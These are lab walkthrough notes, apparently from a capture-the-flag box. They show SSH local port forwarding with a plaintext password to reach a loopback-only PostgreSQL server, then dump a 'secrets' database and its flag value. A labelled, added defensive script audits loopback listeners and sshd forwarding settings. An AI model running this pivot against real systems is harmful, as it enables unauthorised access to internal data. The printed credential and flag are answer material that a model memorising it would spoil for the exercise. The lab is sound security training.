LOCAL PORT FORWARDING
#
root@oco:~$ ssh christine@10.129.22.40 -L 31173:127.0.0.1:5432
christine@10.129.22.40's password: funnel123#!#
* the ssh client (attackerMachine) establishes an encrypted connection
to the remote SSH server (targetMachine) and listens for incoming
connections on local port 31173 (attackerMachine).
- when a client connects to that local port, the ssh client (attackerMachine)
sends the connection through the tunnel, and the SSH server (targetMachine)
connects to 127.0.0.1:5432 on its own side. this lets the local client
(attackerMachine) access a service bound to the target's loopback
interface as if it were running on the local machine.
christine@funnel:~$ ss -tlpna
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:38617 0.0.0.0:*
ESTAB 0 0 10.129.22.40:22 10.10.14.215:46754
SYN-SENT 0 1 10.129.22.40:42680 8.8.8.8:53
LISTEN 0 32 *:21 *:*
LISTEN 0 128 [::]:22 [::]:*
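* added example, not part of the original notes: a defender-side check for the exposure the tunnel relies on. it lists loopback-only listeners from ss output and reports whether sshd permits -L forwarding. the function names and the sshd -T excerpts are constructed for illustration, and PermitOpen restrictions are not evaluated.

```shell
#!/bin/sh
# ss lines copied from the listing above (SYN-SENT row omitted).
SS_SAMPLE='State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:*
LISTEN 0 4096 127.0.0.1:38617 0.0.0.0:*
ESTAB 0 0 10.129.22.40:22 10.10.14.215:46754
LISTEN 0 32 *:21 *:*
LISTEN 0 128 [::]:22 [::]:*'

# Constructed `sshd -T` excerpts: OpenSSH default vs. forwarding turned off.
SSHD_DEFAULT='port 22
allowtcpforwarding yes'
SSHD_HARDENED='port 22
allowtcpforwarding no'

# Print the Local Address:Port of LISTEN sockets bound to loopback only.
loopback_listeners() {
    awk '$1 == "LISTEN" && ($4 ~ /^127\./ || $4 ~ /^\[::1\]/) { print $4 }'
}

# Exit 0 if the sshd settings on stdin permit local (-L) forwarding.
# AllowTcpForwarding defaults to yes when the keyword is absent.
local_forwarding_allowed() {
    value=$(awk 'tolower($1) == "allowtcpforwarding" && !seen { v = tolower($2); seen = 1 }
                 END { print (seen ? v : "yes") }')
    case "$value" in
        yes|all|local) return 0 ;;
        *) return 1 ;;
    esac
}

# $1 = ss output, $2 = sshd -T output. PermitOpen is not evaluated here.
audit() {
    if printf '%s\n' "$2" | local_forwarding_allowed; then
        printf '%s\n' "$1" | loopback_listeners | sed 's/^/reachable with ssh -L: /'
    else
        echo 'sshd refuses -L forwarding (AllowTcpForwarding)'
    fi
}

audit "$SS_SAMPLE" "$SSHD_DEFAULT"
audit "$SS_SAMPLE" "$SSHD_HARDENED"
```

* the sshd_config man page notes that disabling TCP forwarding does not stop a user with shell access from running their own forwarder, so a loopback-only service still needs its own authentication.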
#
root@oco:~$ psql -U christine -h localhost -p 31173
Password for user christine:
psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
Type "help" for help.
christine=#
* specify localhost with the -h option to target the tunnel created
earlier with SSH, and port 31173 with the -p option, which is the
port the tunnel is listening on.
christine=# \list
List of databases
Name | Owner | Encoding | Collate | Ctype | ICU Locale | Locale Provider | Access privileges
-----------+-----------+----------+------------+------------+------------+-----------------+-------------------------
christine | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
postgres | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
secrets | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc |
template0 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
template1 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine +
| | | | | | | christine=CTc/christine
(5 rows)
* this lists the existing databases
christine=# \connect secrets
psql (15.8 (Debian 15.8-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
You are now connected to database "secrets" as user "christine".
* this connects to the specified DB
secrets=# \dt
List of relations
Schema | Name | Type | Owner
--------+------+-------+-----------
public | flag | table | christine
(1 row)
* this lists the database's tables
secrets=# select * from flag;
value
----------------------------------
cf277664b1771217d7006acdea006db1
(1 row)